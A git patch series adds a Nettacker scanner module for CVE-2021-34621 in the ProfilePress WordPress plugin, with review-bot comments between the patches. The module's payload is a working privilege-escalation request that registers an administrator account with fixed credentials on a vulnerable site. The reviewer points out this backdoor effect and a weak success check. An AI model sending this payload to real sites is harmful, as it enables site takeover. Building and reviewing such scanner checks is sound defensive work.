From 7e3f8dab3008337d8e8411d0c04b441851d4a84d Mon Sep 17 00:00:00 2001
From: Manushya-a <159174280+Manushya-a@users.noreply.github.com>
Date: Fri, 28 Feb 2025 22:52:13 +0530
Subject: [PATCH 1/3] Created 'wp_plugin_cve_2021_34621_vuln'

---
 docs/Modules.md | 1 +
 .../vuln/wp_plugin_cve_2021_34621.yaml | 97 +++++++++++++++++++
 2 files changed, 98 insertions(+)
 create mode 100644 nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml

diff --git a/docs/Modules.md b/docs/Modules.md
index e65ee37da..439d4f30a 100644
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -160,6 +160,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**ssl_weak_cipher_vuln**' - check if server's SSL configuration supports weak cipher suites
 * '**wordpress_dos_cve_2018_6389_vuln**' - check if Wordpress is vulnerable to CVE-2018-6389 Denial Of Service (DOS)
 * '**wp_xmlrpc_bruteforce_vuln**' - check if Wordpress is vulnerable to credential Brute Force via XMLRPC wp.getUsersBlogs
+* '**wp_plugin_cve_2021_34621_vuln**' - check the target for CVE-2021-34621
 * '**wp_xmlrpc_pingback_vuln**' - check if Wordpress is vulnerable to XMLRPC pingback
 * '**x_powered_by_vuln**' - check if the web server is leaking server configuration in 'X-Powered-By' response header
 * '**xdebug_rce_vuln**' - checks if web server is running XDebug version 2.5.5 vulnerable to RCE
diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
new file mode 100644
index 000000000..4c1556ff6
--- /dev/null
+++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
@@ -0,0 +1,97 @@
+info:
+ name: wp_plugin_cve_2021_34621_vuln
+ author: Manushya
+ severity: 9.8
+ description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security.
+ references:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-2011
+ - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621/
+ profiles:
+ - vuln
+ - vulnerability
+ - http
+ - high_severity
+ - wordpress
+ - wp
+ - profile_press
+
+payloads:
+ - library: http
+ steps:
+ - method: post
+ timeout: 3
+ headers:
+ User-Agent: "{user_agent}"
+ content-Type: multipart/form-data; boundary=----WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Accept: application/json, text/javascript, */*; q=0.01
+ Accept-Encoding: gzip, deflate, br
+ Connection: keep-alive
+ X-Requested-With: XMLHttpRequest
+
+ allow_redirects: false
+ ssl: false
+ url:
+ nettacker_fuzzer:
+ input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php/"
+ prefix: ""
+ suffix: ""
+ interceptors:
+ data:
+ schema:
+ - "http"
+ - "https"
+ ports:
+ - 80
+ - 443
+ data: |
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_username"
+
+ xyzrandom
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_email"
+
+ xyzrandom@gmail.com
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_password"
+
+ randomxyz
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_password_present"
+
+ true
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_first_name"
+
+ xyz
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="reg_last_name"
+
+ abc
+ 
------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="wp_capabilities[administrator]"
+
+ 1
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="signup_form_id"
+
+ 1
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="action"
+
+ pp_ajax_signup
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk
+ Content-Disposition: form-data; name="melange_id"
+
+
+ ------WebKitFormBoundary5XkgsgiDB4ZqFfxk--
+
+ response:
+ condition_type: and
+ conditions:
+ status_code:
+ regex: "500"
+ reverse: false
+ content:
+ regex: "There has been a critical error on this website."
+ reverse: false

From b13caddccb3efaa8e623f9d38ecb3078305f30c7 Mon Sep 17 00:00:00 2001
From: Manav Acharya <159174280+Manushya-a@users.noreply.github.com>
Date: Fri, 28 Feb 2025 23:02:58 +0530
Subject: [PATCH 2/3] Update wp_plugin_cve_2021_34621.yaml

Signed-off-by: Manav Acharya <159174280+Manushya-a@users.noreply.github.com>
---
 nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
index 4c1556ff6..27de5c862 100644
--- a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
+++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
@@ -1,6 +1,6 @@
 info:
 name: wp_plugin_cve_2021_34621_vuln
- author: Manushya
+ author: Manushya-a
 severity: 9.8
 description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security.
 references:

From 6414130f437d022f89345354fa316f869b4fce41 Mon Sep 17 00:00:00 2001
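Review bot: The success condition at the end of the hunk matches WordPress's generic fatal-error page (`status_code` 500 plus `There has been a critical error on this website.`), which is not specific to ProfilePress or to a privileged signup having succeeded, so the module will flag any site whose `admin-ajax.php` crashes on this POST and may miss a vulnerable one that answers `pp_ajax_signup` with the plugin's normal JSON response. The payload is also state-changing: on a vulnerable target it registers an administrator with the fixed, publicly visible credentials `xyzrandom` / `randomxyz`, which leaves a known backdoor account behind and makes a repeat scan non-reproducible once that username is taken. I would say so in `info.description`, e.g. `Intrusive: a positive result means an administrator account named xyzrandom was created on the target and must be removed.`, and add a comment above `response:` stating what the 500 signature is based on, or match the plugin's signup response instead. Requesting `Accept-Encoding: gzip, deflate, br` also risks an undecodable brotli body that would defeat the `content` regex unless the HTTP library is known to decode br. Minor: the header key `content-Type` should be written `Content-Type` to match the other header names.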
From: Manushya-a <159174280+Manushya-a@users.noreply.github.com>
Date: Sun, 2 Mar 2025 09:15:28 +0530
Subject: [PATCH 3/3] Update wp_plugin_cve_2021_34621.yaml

---
 nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
index 27de5c862..d42257870 100644
--- a/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
+++ b/nettacker/modules/vuln/wp_plugin_cve_2021_34621.yaml
@@ -4,8 +4,8 @@ info:
 severity: 9.8
 description: A significant vulnerability discovered in the user registration component of the ProfilePress WordPress plugin. This security issue, identified as CVE-2021-34621, enables unauthorized users to register on websites with administrator privileges, which could result in a full compromise of the site's security.
 references:
- - https://nvd.nist.gov/vuln/detail/CVE-2024-2011
- - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
+ - https://blog.securelayer7.net/easily-exploitable-critical-vulnerability-in-profilepress-plugin-of-wordpress-cve-2021-34621
 profiles:
 - vuln
 - vulnerability
@@ -13,7 +13,6 @@ info:
 - high_severity
 - wordpress
 - wp
- - profile_press
 
 payloads:
 - library: http
@@ -32,7 +31,7 @@ payloads:
 ssl: false
 url:
 nettacker_fuzzer:
- input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php/"
+ input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php"
 prefix: ""
 suffix: ""
 interceptors:
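Review bot: The corrected `input_format` still expands `{{schema}}` and `{{ports}}` independently, so as far as I can tell from the fuzzer block the POST is also sent to `http://target:443` and `https://target:80`; with `timeout: 3` and an empty `interceptors:` each invalid pairing costs a TLS error or a hang-up per target and doubles the number of state-changing signup attempts. If the fuzzer supports it, constraining the combinations via `interceptors` (or enumerating the two valid scheme/port pairs directly) would remove them; otherwise a comment above `interceptors:` such as `# all four schema x port combinations are probed deliberately` would make the intent explicit. The `schema` and `ports` lists themselves lie outside this hunk.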